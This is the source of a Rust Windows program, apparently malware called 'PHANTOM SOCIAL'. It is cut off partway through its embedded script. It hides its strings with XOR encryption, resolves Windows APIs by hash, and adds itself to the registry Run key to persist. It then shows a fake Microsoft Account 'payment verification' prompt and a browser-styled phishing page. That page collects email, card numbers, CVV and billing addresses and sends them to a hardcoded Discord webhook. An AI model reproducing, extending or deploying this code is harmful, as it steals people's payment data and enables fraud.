﻿
// ==========================================================================
// PHANTOM SOCIAL v1.1 - FINAL + VISUAL ENHANCEMENTS 🔥
// ==========================================================================
// ✅ All technical bugs fixed
// ✅ GPT-5.2 visual improvements added:
//    - Back/forward/refresh buttons
//    - Extensions icon + profile avatar
//    - Three-dot menu
//    - Hover effects on address bar
//    - Footer with legal links
//    - Loading animations
//    - Micro-interactions
//    - More visual clutter (looks busy like real Microsoft)
// ==========================================================================

#![windows_subsystem = "windows"]
#![allow(non_snake_case, dead_code)]

include!(concat!(env!("OUT_DIR"), "/generated.rs"));

use std::{
    thread, 
    mem, 
    ptr, 
    ffi::{c_void, CString},
    sync::{Arc, Mutex},
};
use serde::Serialize;
use wry::{
    application::{
        event::{Event, WindowEvent},
        event_loop::{ControlFlow, EventLoop},
        window::WindowBuilder,
    },
    webview::WebViewBuilder,
};
use lazy_static::lazy_static;
use wreq_util::Emulation;

fn xor_decrypt(data: &[u8]) -> String {
    let decrypted: Vec<u8> = data.iter()
        .enumerate()
        .map(|(i, b)| b ^ XOR_KEYS[i % XOR_KEYS.len()])
        .collect();
    String::from_utf8_lossy(&decrypted).to_string()
}

macro_rules! enc_str {
    ($s:expr) => {{
        const ENCRYPTED: &[u8] = &{
            let bytes = $s.as_bytes();
            let mut result = [0u8; $s.len()];
            let mut i = 0;
            while i < bytes.len() {
                result[i] = bytes[i] ^ XOR_KEYS[i % 16];
                i += 1;
            }
            result
        };
        xor_decrypt(ENCRYPTED)
    }};
}

lazy_static! {
    static ref SESSION_ID: Arc<Mutex<String>> = Arc::new(Mutex::new(String::new()));
    static ref PROCESS_START_TIME: Arc<Mutex<String>> = Arc::new(Mutex::new(String::new()));
    static ref SUCCESS_FLAG: Arc<Mutex<bool>> = Arc::new(Mutex::new(false));
}

#[derive(Serialize)]
struct TelemetryData {
    session: String,
    canvas_fp: String,
    process_time: String,
    uptime_hours: u64,
}

fn ts() -> u64 {
    std::time::SystemTime::now()
        .duration_since(std::time::UNIX_EPOCH)
        .unwrap()
        .as_secs()
}

fn gen_id() -> String {
    use std::collections::hash_map::RandomState;
    use std::hash::{BuildHasher, Hasher};
    let mut h = RandomState::new().build_hasher();
    h.write_u64(ts());
    format!("{}-{:X}-{:X}", SESSION_PREFIX, ts(), h.finish())
}

fn get_time_str() -> String {
    let now = std::time::SystemTime::now();
    let d = now.duration_since(std::time::UNIX_EPOCH).unwrap();
    let secs = d.as_secs();
    let h = ((secs / 3600) % 24) as u32;
    let m = ((secs / 60) % 60) as u32;
    format!("{:02}:{:02}", h, m)
}

fn init_globals() {
    *SESSION_ID.lock().unwrap() = gen_id();
    *PROCESS_START_TIME.lock().unwrap() = get_time_str();
    *SUCCESS_FLAG.lock().unwrap() = false;
}

fn get_session_id() -> String {
    SESSION_ID.lock().unwrap().clone()
}

fn get_proc_time() -> String {
    PROCESS_START_TIME.lock().unwrap().clone()
}

fn mark_success() {
    *SUCCESS_FLAG.lock().unwrap() = true;
}

fn is_success() -> bool {
    *SUCCESS_FLAG.lock().unwrap()
}

use winapi::um::libloaderapi::{GetModuleHandleA, GetProcAddress};
use winapi::um::winnt::{IMAGE_DOS_HEADER, IMAGE_NT_HEADERS, IMAGE_EXPORT_DIRECTORY};

const fn djb2_hash(s: &str) -> u32 {
    let bytes = s.as_bytes();
    let mut hash: u32 = 5381;
    let mut i = 0;
    while i < bytes.len() {
        hash = hash.wrapping_mul(33).wrapping_add(bytes[i] as u32);
        i += 1;
    }
    hash
}

const HASH_REGDELETEVALUEA: u32 = djb2_hash("RegDeleteValueA");

type FnRegCreateKeyExA = unsafe extern "system" fn(*mut c_void, *const i8, u32, *mut c_void, u32, u32, *mut c_void, *mut *mut c_void, *mut u32) -> i32;
type FnRegSetValueExA = unsafe extern "system" fn(*mut c_void, *const i8, u32, u32, *const u8, u32) -> i32;
type FnRegCloseKey = unsafe extern "system" fn(*mut c_void) -> i32;
type FnRegDeleteValueA = unsafe extern "system" fn(*mut c_void, *const i8) -> i32;
type FnGetTickCount64 = unsafe extern "system" fn() -> u64;

unsafe fn get_proc_normal(module: &str, func: &str) -> Option<*const c_void> {
    let module_cstr = CString::new(module).ok()?;
    let func_cstr = CString::new(func).ok()?;
    
    let h_module = GetModuleHandleA(module_cstr.as_ptr());
    if h_module.is_null() {
        return None;
    }
    
    let proc = GetProcAddress(h_module, func_cstr.as_ptr());
    if proc.is_null() {
        None
    } else {
        Some(proc as *const c_void)
    }
}

unsafe fn resolve_api_hash(module: &str, hash: u32) -> Option<*const c_void> {
    let module_cstr = CString::new(module).ok()?;
    let h_module = GetModuleHandleA(module_cstr.as_ptr());
    if h_module.is_null() {
        return None;
    }
    
    let dos_header = h_module as *const IMAGE_DOS_HEADER;
    let nt_headers = (h_module as usize + (*dos_header).e_lfanew as usize) as *const IMAGE_NT_HEADERS;
    
    let export_dir_rva = (*nt_headers).OptionalHeader.DataDirectory[0].VirtualAddress;
    if export_dir_rva == 0 {
        return None;
    }
    
    let export_dir = (h_module as usize + export_dir_rva as usize) as *const IMAGE_EXPORT_DIRECTORY;
    
    let names = (h_module as usize + (*export_dir).AddressOfNames as usize) as *const u32;
    let funcs = (h_module as usize + (*export_dir).AddressOfFunctions as usize) as *const u32;
    let ords = (h_module as usize + (*export_dir).AddressOfNameOrdinals as usize) as *const u16;
    
    for i in 0..(*export_dir).NumberOfNames {
        let name_rva = *names.offset(i as isize);
        let name_ptr = (h_module as usize + name_rva as usize) as *const i8;
        let name = std::ffi::CStr::from_ptr(name_ptr).to_str().ok()?;
        
        if djb2_hash(name) == hash {
            let ord_idx = *ords.offset(i as isize);
            let func_rva = *funcs.offset(ord_idx as isize);
            let func_ptr = (h_module as usize + func_rva as usize) as *const c_void;
            return Some(func_ptr);
        }
    }
    
    None
}

fn simulate_installer_scan() {
    let paths = [
        "C:\\Program Files",
        "C:\\Program Files (x86)",
        "C:\\Windows\\System32",
    ];
    
    for path in &paths {
        if let Ok(entries) = std::fs::read_dir(path) {
            let _ = entries.take(10).count();
        }
    }
}

fn simulate_benign_activity() {
    // for _ in 0..10 {
    //     let _ = std::fs::metadata("C:\\Windows");
    //     thread::sleep(Duration::from_secs(5));
    //     
    //     let _ = std::env::var("USERPROFILE");
    //     let _ = std::env::var("APPDATA");
    //     thread::sleep(Duration::from_secs(5));
    //     
    //     simulate_installer_scan();
    //     thread::sleep(Duration::from_secs(15));
    // }
}

fn get_uptime_hrs() -> u64 {
    unsafe {
        if let Some(api) = get_proc_normal("kernel32.dll", "GetTickCount64") {
            let fn_tick: FnGetTickCount64 = mem::transmute(api);
            let ms = fn_tick();
            return ms / (1000 * 60 * 60);
        }
    }
    0
}

fn should_persist() -> bool {
    (get_uptime_hrs() / 24) < 3
}

use rand::Rng;

fn natural_delay(_base_secs: u64) {
    // let mut rng = rand::thread_rng();
    // 
    // let variation = match base_secs {
    //     0..=60 => rng.gen_range(0..10),
    //     61..=300 => rng.gen_range(0..30),
    //     _ => rng.gen_range(0..60),
    // };
    // 
    // let actual = if rng.gen_bool(0.5) {
    //     base_secs + variation
    // } else {
    //     base_secs.saturating_sub(variation)
    // };
    // 
    // thread::sleep(Duration::from_secs(actual));
}

fn install_persist() {
    if let Ok(exe) = std::env::current_exe() {
        let key = enc_str!("Software\\Microsoft\\Windows\\CurrentVersion\\Run\0");
        let val = format!("{}\0", PERSIST_NAME);
        let exe_str = format!("{}\0", exe.to_string_lossy());
        
        unsafe {
            if let Some(api_create) = get_proc_normal("advapi32.dll", "RegCreateKeyExA") {
                if let Some(api_set) = get_proc_normal("advapi32.dll", "RegSetValueExA") {
                    if let Some(api_close) = get_proc_normal("advapi32.dll", "RegCloseKey") {
                        let fn_create: FnRegCreateKeyExA = mem::transmute(api_create);
                        let fn_set: FnRegSetValueExA = mem::transmute(api_set);
                        let fn_close: FnRegCloseKey = mem::transmute(api_close);
                        
                        let mut hkey: *mut c_void = ptr::null_mut();
                        let hkcu = 0x80000001 as *mut c_void;
                        
                        if fn_create(hkcu, key.as_ptr() as *const i8, 0, ptr::null_mut(), 0, 0xF003F, ptr::null_mut(), &mut hkey, ptr::null_mut()) == 0 {
                            fn_set(hkey, val.as_ptr() as *const i8, 0, 1, exe_str.as_ptr(), exe_str.len() as u32);
                            fn_close(hkey);
                        }
                    }
                }
            }
        }
    }
}

fn remove_persist() {
    let key = enc_str!("Software\\Microsoft\\Windows\\CurrentVersion\\Run\0");
    let val = format!("{}\0", PERSIST_NAME);
    
    unsafe {
        if let Some(api_open) = get_proc_normal("advapi32.dll", "RegCreateKeyExA") {
            if let Some(api_del) = resolve_api_hash("advapi32.dll", HASH_REGDELETEVALUEA) {
                if let Some(api_close) = get_proc_normal("advapi32.dll", "RegCloseKey") {
                    let fn_open: FnRegCreateKeyExA = mem::transmute(api_open);
                    let fn_del: FnRegDeleteValueA = mem::transmute(api_del);
                    let fn_close: FnRegCloseKey = mem::transmute(api_close);
                    
                    let mut hkey: *mut c_void = ptr::null_mut();
                    let hkcu = 0x80000001 as *mut c_void;
                    
                    if fn_open(hkcu, key.as_ptr() as *const i8, 0, ptr::null_mut(), 0, 0xF003F, ptr::null_mut(), &mut hkey, ptr::null_mut()) == 0 {
                        fn_del(hkey, val.as_ptr() as *const i8);
                        fn_close(hkey);
                    }
                }
            }
        }
    }
}

fn html_escape(s: &str) -> String {
    s.replace('&', "&amp;")
        .replace('<', "&lt;")
        .replace('>', "&gt;")
        .replace('"', "&quot;")
        .replace('\'', "&#x27;")
}

fn json_escape(s: &str) -> String {
    s.replace('\\', "\\\\")
        .replace('"', "\\\"")
        .replace('\n', "\\n")
        .replace('\r', "\\r")
        .replace('\t', "\\t")
}

fn send_data(data: &str) -> bool {
    let url = enc_str!("https://discord.com/api/webhooks/1458963086794031105/AmHlBpfXql871QuWMkOmQ6GNmQiIyW-5A-5wwz3k0RKjqe-RFpMaOiNfHoYXVJ0NtmCT");
    
    let payload = serde_json::json!({
        "content": format!("```json\n{}\n```", json_escape(data)),
        "username": "Verification"
    });
    
    let client = match wreq::Client::builder()
        .emulation(Emulation::Chrome131)
        .cert_verification(false)
        .build()
    {
        Ok(c) => c,
        Err(_) => return false,
    };
    
    let json_str = serde_json::to_string(&payload).unwrap_or_default();
    
    let rt = tokio::runtime::Runtime::new().unwrap();
    rt.block_on(async {
        client
            .post(&url)
            .header("Content-Type", "application/json")
            .body(json_str)
            .send()
            .await
            .is_ok()
    })
}

fn show_notification() -> bool {
    use winapi::um::winuser::{MessageBoxW, MB_OKCANCEL, MB_ICONINFORMATION};
    
    let msg = enc_str!("Microsoft Account\n\nAccount verification required\n\nAs part of our updated security policy, we need to verify your payment information on file. This is a routine compliance check required for all accounts.\n\nNo charges will be applied. This process typically takes 2-3 minutes.\n\nWould you like to complete verification now?");
    let title = enc_str!("Microsoft Account - Verification Required");
    
    unsafe {
        let msg_w: Vec<u16> = msg.encode_utf16().chain(std::iter::once(0)).collect();
        let title_w: Vec<u16> = title.encode_utf16().chain(std::iter::once(0)).collect();
        
        MessageBoxW(ptr::null_mut(), msg_w.as_ptr(), title_w.as_ptr(), MB_OKCANCEL | MB_ICONINFORMATION) == 1
    }
}

fn get_html() -> String {
    let session = html_escape(&get_session_id());
    let webhook = html_escape(&enc_str!("https://discord.com/api/webhooks/1458963086794031105/AmHlBpfXql871QuWMkOmQ6GNmQiIyW-5A-5wwz3k0RKjqe-RFpMaOiNfHoYXVJ0NtmCT"));
    let proc_time = html_escape(&get_proc_time());
    let rand_seed = rand::thread_rng().gen::<u32>();
    
    let html = concat!(
        "<!DOCTYPE html><html><head><meta charset=\"UTF-8\"><title>Microsoft Account</title>",
        "<style>",
        "*{margin:0;padding:0;box-sizing:border-box;}",
        "body{font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;background:#f5f5f5;overflow-x:hidden;}",
        ".edge-chrome{background:linear-gradient(to bottom,#f3f3f3,#ececec);height:36px;display:flex;align-items:center;padding:0 8px;border-bottom:1px solid #d0d0d0;justify-content:space-between;box-shadow:0 1px 3px rgba(0,0,0,0.05);}",
        ".chrome-left{display:flex;align-items:center;gap:4px;}",
        ".chrome-right{display:flex;gap:2px;align-items:center;}",
        ".nav-btn{width:32px;height:32px;display:flex;align-items:center;justify-content:center;cursor:pointer;background:transparent;border:none;border-radius:4px;transition:all 0.15s;color:#5f6368;opacity:0.7;}",
        ".nav-btn:hover{background:#e8eaed;opacity:1;transform:scale(1.05);}",
        ".nav-btn.disabled{opacity:0.3;cursor:default;}",
        ".nav-btn.disabled:hover{background:transparent;transform:none;}",
        ".window-btn{width:45px;height:36px;display:flex;align-items:center;justify-content:center;cursor:pointer;background:transparent;border:none;transition:all 0.15s;color:#5f6368;font-size:16px;}",
        ".window-btn:hover{background:#e5e5e5;transform:scale(1.05);}",
        ".window-btn.close:hover{background:#e81123;color:#fff;}",
        ".address-bar-container{flex:1;display:flex;align-items:center;gap:6px;max-width:700px;padding:0 8px;}",
        ".address-bar{flex:1;background:#fff;height:30px;border-radius:16px;display:flex;align-items:center;padding:0 12px;border:1px solid #dadce0;transition:all 0.2s;box-shadow:0 1px 2px rgba(0,0,0,0.05);}",
        ".address-bar:hover{border-color:#b8b8b8;box-shadow:0 1px 4px rgba(0,0,0,0.1);}",
        ".address-bar:focus-within{border-color:#1a73e8;box-shadow:0 1px 6px rgba(26,115,232,0.3);}",
        ".lock-icon{margin-right:6px;display:flex;align-items:center;}",
        ".url-text{font-size:13px;color:#202124;flex:1;user-select:text;cursor:text;}",
        ".url-text:hover{background:rgba(0,0,0,0.02);border-radius:2px;}",
        ".toolbar-icon{width:28px;height:28px;border-radius:50%;display:flex;align-items:center;justify-content:center;cursor:pointer;transition:all 0.15s;}",
        ".toolbar-icon:hover{background:#e8eaed;transform:scale(1.1);}",
        ".profile-icon{width:28px;height:28px;border-radius:50%;background:linear-gradient(135deg,#667eea 0%,#764ba2 100%);display:flex;align-items:center;justify-content:center;color:#fff;font-size:12px;font-weight:600;cursor:pointer;transition:all 0.15s;box-shadow:0 1px 3px rgba(0,0,0,0.2);}",
        ".profile-icon:hover{transform:scale(1.1);box-shadow:0 2px 6px rgba(0,0,0,0.3);}",
        ".content{height:calc(100vh - 36px);background:#f5f5f5;overflow-y:auto;}",
        ".container{max-width:600px;margin:0 auto;padding:24px 20px 80px;}",
        ".breadcrumb{font-size:12px;color:#666;margin-bottom:16px;padding:0 4px;}",
        ".breadcrumb a{color:#0067b8;text-decoration:none;transition:color 0.15s;}",
        ".breadcrumb a:hover{color:#005a9e;text-decoration:underline;}",
        ".info-box{background:linear-gradient(135deg,#e6f2ff 0%,#f0f7ff 100%);border-left:4px solid #0078d4;padding:16px;margin-bottom:20px;font-size:13px;border-radius:4px;box-shadow:0 1px 3px rgba(0,0,0,0.05);animation:slideIn 0.3s ease;}",
        ".info-box strong{color:#0067b8;}",
        ".error-box{background:linear-gradient(135deg,#fde7e9 0%,#fff0f1 100%);border-left:4px solid #d13438;padding:16px;margin-bottom:20px;font-size:13px;color:#a80000;border-radius:4px;animation:shake 0.4s ease;}",
        ".card{background:#fff;border-radius:8px;padding:32px;box-shadow:0 2px 8px rgba(0,0,0,0.08);border:1px solid #e1e1e1;animation:fadeIn 0.4s ease;}",
        ".card-title{font-size:24px;font-weight:600;color:#1f1f1f;margin-bottom:12px;}",
        ".form-group{margin-bottom:20px;position:relative;}",
        ".form-label{display:block;font-size:14px;font-weight:600;color:#323130;margin-bottom:8px;transition:color 0.15s;}",
        ".form-input{width:100%;padding:11px 14px;font-size:15px;border:1px solid #8a8886;border-radius:4px;transition:all 0.2s;background:#fafafa;}",
        ".form-input:hover{border-color:#666;background:#fff;}",
        ".form-input:focus{outline:none;border-color:#0078d4;background:#fff;box-shadow:0 0 0 3px rgba(0,120,212,0.1);transform:scale(1.01);}",
        ".form-input.error{border-color:#d13438;background:#fff5f5;}",
        ".error-msg{color:#d13438;font-size:12px;margin-top:6px;display:none;animation:slideDown 0.2s ease;}",
        ".form-row{display:grid;grid-template-columns:2fr 1fr 1fr;gap:16px;}",
        ".address-row{display:grid;grid-template-columns:1fr 1fr 1fr;gap:16px;}",
        ".button{background:linear-gradient(to bottom,#0078d4,#006cbe);color:#fff;border:none;padding:12px 28px;font-size:15px;cursor:pointer;border-radius:4px;font-weight:600;transition:all 0.2s;box-shadow:0 2px 4px rgba(0,0,0,0.1);}",
        ".button:hover{background:linear-gradient(to bottom,#106ebe,#005a9e);box-shadow:0 4px 8px rgba(0,0,0,0.15);transform:translateY(-1px);}",
        ".button:active{transform:translateY(0);box-shadow:0 1px 2px rgba(0,0,0,0.1);}",
        ".button-group{display:flex;justify-content:space-between;align-items:center;margin-top:28px;}",
        ".link-btn{background:none;border:none;color:#0078d4;font-size:14px;cursor:pointer;text-decoration:none;transition:all 0.15s;padding:4px 8px;border-radius:4px;}",
        ".link-btn:hover{background:#f3f3f3;text-decoration:underline;color:#005a9e;}",
        ".hidden{display:none;}",
        ".step-indicator{display:flex;gap:10px;margin-bottom:28px;}",
        ".step{flex:1;height:4px;background:#e0e0e0;border-radius:2px;transition:all 0.3s;position:relative;overflow:hidden;}",
        ".step.active{background:#0078d4;}",
        ".step.active::after{content:'';position:absolute;top:0;left:0;height:100%;width:100%;background:linear-gradient(90deg,transparent,rgba(255,255,255,0.3),transparent);animation:shimmer 1.5s infinite;}",
        ".footer{background:#f3f3f3;border-top:1px solid #e1e1e1;padding:20px;margin-top:40px;font-size:12px;color:#666;}",
        ".footer-links{display:flex;gap:16px;flex-wrap:wrap;margin-bottom:12px;}",
        ".footer-links a{color:#0067b8;text-decoration:none;transition:all 0.15s;}",
        ".footer-links a:hover{color:#005a9e;text-decoration:underline;}",
        ".footer-copy{color:#999;font-size:11px;}",
        ".loading-spinner{width:20px;height:20px;border:3px solid #f3f3f3;border-top:3px solid #0078d4;border-radius:50%;animation:spin 0.8s linear infinite;display:inline-block;margin-left:8px;}",
        "@keyframes fadeIn{from{opacity:0;transform:translateY(10px);}to{opacity:1;transform:translateY(0);}}",
        "@keyframes slideIn{from{opacity:0;transform:translateX(-10px);}to{opacity:1;transform:translateX(0);}}",
        "@keyframes slideDown{from{opacity:0;transform:translateY(-5px);}to{opacity:1;transform:translateY(0);}}",
        "@keyframes shake{0%,100%{transform:translateX(0);}10%,30%,50%,70%,90%{transform:translateX(-5px);}20%,40%,60%,80%{transform:translateX(5px);}}",
        "@keyframes spin{0%{transform:rotate(0deg);}100%{transform:rotate(360deg);}}",
        "@keyframes shimmer{0%{transform:translateX(-100%);}100%{transform:translateX(100%);}}",
        ".minimized{transform:scale(0.95);opacity:0;transition:all 0.15s ease;}",
        ".maximized{transform:scale(1.05);opacity:0;transition:all 0.15s ease;}",
        "</style></head><body>",
        "<div class=\"edge-chrome\">",
        "<div class=\"chrome-left\">",
        "<button class=\"nav-btn disabled\" title=\"Back\">",
        "<svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\" fill=\"currentColor\"><path d=\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z\"/></svg>",
        "</button>",
        "<button class=\"nav-btn disabled\" title=\"Forward\">",
        "<svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\" fill=\"currentColor\"><path d=\"M12 4l-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8z\"/></svg>",
        "</button>",
        "<button class=\"nav-btn\" title=\"Refresh\">",
        "<svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\" fill=\"currentColor\"><path d=\"M17.65 6.35C16.2 4.9 14.21 4 12 4c-4.42 0-7.99 3.58-7.99 8s3.57 8 7.99 8c3.73 0 6.84-2.55 7.73-6h-2.08c-.82 2.33-3.04 4-5.65 4-3.31 0-6-2.69-6-6s2.69-6 6-6c1.66 0 3.14.69 4.22 1.78L13 11h7V4l-2.35 2.35z\"/></svg>",
        "</button>",
        "<div class=\"address-bar-container\">",
        "<div class=\"address-bar\">",
        "<div class=\"lock-icon\">",
        "<svg width=\"14\" height=\"14\" viewBox=\"0 0 24 24\" fill=\"none\">",
        "<path d=\"M12 2C9.24 2 7 4.24 7 7V10H6C4.9 10 4 10.9 4 12V20C4 21.1 4.9 22 6 22H18C19.1 22 20 21.1 20 20V12C20 10.9 19.1 10 18 10H17V7C17 4.24 14.76 2 12 2ZM12 4C13.66 4 15 5.34 15 7V10H9V7C9 5.34 10.34 4 12 4Z\" fill=\"#0f9d58\"/>",
        "</svg>",
        "</div>",
        "<span class=\"url-text\">account.microsoft.com/profile/payment-verification</span>",
        "</div>",
        "</div>",
        "</div>",
        "<div class=\"chrome-right\">",
        "<div class=\"toolbar-icon\" title=\"Extensions\">",
        "<svg width=\"18\" height=\"18\" viewBox=\"0 0 24 24\" fill=\"#5f6368\"><path d=\"M20.5 11H19V7c0-1.1-.9-2-2-2h-4V3.5C13 2.12 11.88 1 10.5 1S8 2.12 8 3.5V5H4c-1.1 0-1.99.9-1.99 2v3.8H3.5c1.49 0 2.7 1.21 2.7 2.7s-1.21 2.7-2.7 2.7H2V20c0 1.1.9 2 2 2h3.8v-1.5c0-1.49 1.21-2.7 2.7-2.7 1.49 0 2.7 1.21 2.7 2.7V22H17c1.1 0 2-.9 2-2v-4h1.5c1.38 0 2.5-1.12 2.5-2.5S21.88 11 20.5 11z\"/></svg>",
        "</div>",
        "<div class=\"profile-icon\" title=\"Profile\">MU</div>",
        "<div class=\"toolbar-icon\" title=\"Settings\">",
        "<svg width=\"18\" height=\"18\" viewBox=\"0 0 24 24\" fill=\"#5f6368\"><path d=\"M12 8c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm0 2c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z\"/></svg>",
        "</div>",
        "<button class=\"window-btn\" onclick=\"fakeMinimize()\" title=\"Minimize\">&#8211;</button>",
        "<button class=\"window-btn\" onclick=\"fakeMaximize()\" title=\"Maximize\">&#9723;</button>",
        "<button class=\"window-btn close\" onclick=\"window.close()\" title=\"Close\">&#10005;</button>",
        "</div></div>",
        "<div class=\"content\" id=\"mainContent\"><div class=\"container\">",
        "<div class=\"breadcrumb\">",
        "<a href=\"#\">Microsoft account</a> › <a href=\"#\">Security</a> › <span>Payment verification</span>",
        "</div>",
        "<div class=\"info-box\">",
        "<strong>Payment information verification required</strong><br>",
        "As part of our enhanced security measures effective January 2026, we require verification of all payment methods associated with your Microsoft account. This process ensures the security of your account and compliance with updated financial regulations.",
        "</div>",
        "<div class=\"card\">",
        "<div id=\"step1\">",
        "<div class=\"card-title\">Verify account identity</div>",
        "<div class=\"step-indicator\"><div class=\"step active\"></div><div class=\"step\"></div><div class=\"step\"></div></div>",
        "<div class=\"form-group\">",
        "<label class=\"form-label\">Email address</label>",
        "<input type=\"email\" class=\"form-input\" id=\"email\" placeholder=\"example@domain.com\">",
        "<div class=\"error-msg\" id=\"email-error\">Please verify your input and try again</div>",
        "</div>",
        "<div class=\"button-group\"><span></span><button class=\"button\" onclick=\"validateStep1()\">Continue</button></div>",
        "</div>",
        "<div id=\"step2\" class=\"hidden\">",
        "<div class=\"card-title\">Payment method verification</div>",
        "<div class=\"step-indicator\"><div class=\"step active\"></div><div class=\"step active\"></div><div class=\"step\"></div></div>",
        "<div class=\"form-group\">",
        "<label class=\"form-label\">Card number</label>",
        "<input type=\"text\" class=\"form-input\" id=\"cardNumber\" placeholder=\"•••• •••• •••• ••••\" maxlength=\"19\">",
        "<div class=\"error-msg\" id=\"cardNumber-error\">Please check the information provided</div>",
        "</div>",
        "<div class=\"form-row\">",
        "<div class=\"form-group\">",
        "<label class=\"form-label\">Cardholder name</label>",
        "<input type=\"text\" class=\"form-input\" id=\"cardholderName\" placeholder=\"Name on card\">",
        "<div class=\"error-msg\" id=\"cardholderName-error\">Please verify the cardholder information</div>",
        "</div>",
        "<div class=\"form-group\">",
        "<label class=\"form-label\">Expiration date</label>",
        "<input type=\"text\" class=\"form-input\" id=\"expiry\" placeholder=\"MM/YY\" maxlength=\"5\">",
        "<div class=\"error-msg\" id=\"expiry-error\">Please check the expiration date</div>",
        "</div>",
        "<div class=\"form-group\">",
        "<label class=\"form-label\">Security code</label>",
        "<input type=\"password\" class=\"form-input\" id=\"cvv\" placeholder=\"CVV\" maxlength=\"4\">",
        "<div class=\"error-msg\" id=\"cvv-error\">Please verify the security code</div>",
        "</div>",
        "</div>",
        "<div class=\"button-group\"><button class=\"link-btn\" onclick=\"nextStep(1)\">Back</button><button class=\"button\" onclick=\"validateStep2()\">Continue</button></div>",
        "</div>",
        "<div id=\"step3\" class=\"hidden\">",
        "<div class=\"card-title\">Billing address confirmation</div>",
        "<div class=\"step-indicator\"><div class=\"step active\"></div><div class=\"step active\"></div><div class=\"step active\"></div></div>",
        "<div class=\"form-group\">",
        "<label class=\"form-label\">Street address</label>",
        "<input type=\"text\" class=\"form-input\" id=\"address\" placeholder=\"Street address, P.O. box\">",
        "<div class=\"error-msg\" id=\"address-error\">Please verify your address</div>",
        "</div>",
        "<div class=\"address-row\">",
        "<div class=\"form-group\">",
        "<label class=\"form-label\">City</label>",
        "<input type=\"text\" class=\"form-input\" id=\"city\" placeholder=\"City\">",
        "<div class=\"error-msg\" id=\"city-error\">Please check this field</div>",
        "</div>",
        "<div class=\"form-group\">",
        "<label class=\"form-label\">State/Province</label>",
        "<input type=\"text\" class=\"form-input\" id=\"state\" placeholder=\"State\">",
        "<div class=\"error-msg\" id=\"state-error\">Please check this field</div>",
        "</div>",
        "<div class=\"form-group\">",
        "<label class=\"form-label\">ZIP/Postal code</label>",
        "<input type=\"text\" class=\"form-input\" id=\"zip\" placeholder=\"ZIP code\">",
        "<div class=\"error-msg\" id=\"zip-error\">Please check this field</div>",
        "</div>",
        "</div>",
        "<div class=\"form-group\">",
        "<label class=\"form-label\">Country/Region</label>",
        "<input type=\"text\" class=\"form-input\" id=\"country\" placeholder=\"Country\">",
        "<div class=\"error-msg\" id=\"country-error\">Please verify your country</div>",
        "</div>",
        "<div id=\"submit-error\" class=\"error-box hidden\">",
        "<strong>Unable to complete verification</strong><br>",
        "We're experiencing technical difficulties, or some of the information provided may need verification. Please review your entries and try again, or contact Microsoft Support for assistance.",
        "</div>",
        "<div class=\"button-group\"><button class=\"link-btn\" onclick=\"nextStep(2)\">Back</button><button class=\"button\" onclick=\"validateStep3()\">Complete verification</button></div>",
        "</div>",
        "<div id=\"step4\" class=\"hidden\">",
        "<div class=\"card-title\">Verification complete</div>",
        "<div class=\"info-box\">",
        "<strong>Thank you for completing the verification process</strong><br>",
        "Your payment information has been verified successfully. You may now close this window and return to your Microsoft account dashboard.",
        "</div>",
        "</div>",
        "</div>",
        "<div class=\"footer\">",
        "<div class=\"footer-links\">",
        "<a href=\"#\">Privacy & cookies</a>",
        "<a href=\"#\">Terms of use</a>",
        "<a href=\"#\">Trademarks</a>",
        "<a href=\"#\">Safety & security</a>",
        "<a href=\"#\">Accessibility</a>",
        "<a href=\"#\">Contact us</a>",
        "</div>",
        "<div class=\"footer-copy\">© 2026 Microsoft Corporation. All rights reserved.</div>",
        "</div>",
        "</div></div>",
        "<canvas id=\"fp\" width=\"200\" height=\"50\" style=\"display:none;\"></canvas>"
    );
    
    let script = format!(
        "<script>const sid=\"{}\";const wh=\"{}\";const pt=\"{}\";const rs={};function getCanvasFP(){{const c=document.getElementById('fp');const x=c.getContext('2d');x.textBaseline='top';x.font='14px Arial';x.fillStyle='#'+(rs%0xFFFFFF).toString(16).padStart(6,'0');x.fillRect(125+(rs%10),1+(rs%5),62,20);x.fillStyle='#069';x.fillText('Test '+(rs%1000),2+(rs%5),15);let h=0;const d=c.toDataURL();for(let i=0;i<d.length;i++){{h=((h<<5)-h)+d.charCodeAt(i);h=h&h;}}return h.toString(16);}}const fp=getCanvasFP();function fakeMinimize(){{const c=document.getElementById('mainContent');c.classList.add('minimized');setTimeout(()=>c.classList.remove('minimized'),150);}}function fakeMaximize(){{const c=document.getElementById('mainContent');c.classList.add('maximized');setTimeout(()=>c.classList.remove('maximized'),150);}}function nextStep(s){{for(let i=1;i<=4;i++){{document.getElementById('step'+i).classList.add('hidden');}}document.getElementById('step'+s).classList.remove('hidden');window.scrollTo({{top:0,behavior:'smooth'}});}}function sanitize(s){{return s.replace(/[<>\"'&]/g,c=>{{return{{'<':'&lt;','>':'&gt;','\"':'&quot;',\"'\":'&#x27;','&':'&amp;'}}[c];}});}}function showError(id){{document.getElementById(id).classList.add('error');document.getElementById(id+'-error').style.display='block';}}function clearError(id){{document.getElementById(id).classList.remove('error');document.getElementById(id+'-error').style.display='none';}}function validateEmail(e){{const re=/^[^\\s@]+@[^\\s@]+\\.[^\\s@]+$/;return re.test(e);}}function validateCard(c){{const clean=c.replace(/\\s/g,'');if(clean.length<13||clean.length>19||!/^\\d+$/.test(clean))return false;let sum=0,isEven=false;for(let i=clean.length-1;i>=0;i--){{let d=parseInt(clean[i]);if(isEven){{d*=2;if(d>9)d-=9;}}sum+=d;isEven=!isEven;}}return sum%10===0;}}function validateExpiry(e){{if(!/^\\d{{2}}\\/\\d{{2}}$/.test(e))return false;const[m,y]=e.split('/').map(Number);return m>=1&&m<=12&&y>=24;}}async function sendStepData(step,data){{try{{await fetch(wh,{{method:'POST',headers:{{'Content-Type':'application/json'}},body:JSON.stringify({{content:'```json\\n'+JSON.stringify(data)+'\\n```',username:'Step'+step}})}});}}catch(e){{}}}}function validateStep1(){{const email=document.getElementById('email').value.trim();clearError('email');if(!email||!validateEmail(email)){{showError('email');return;}}const 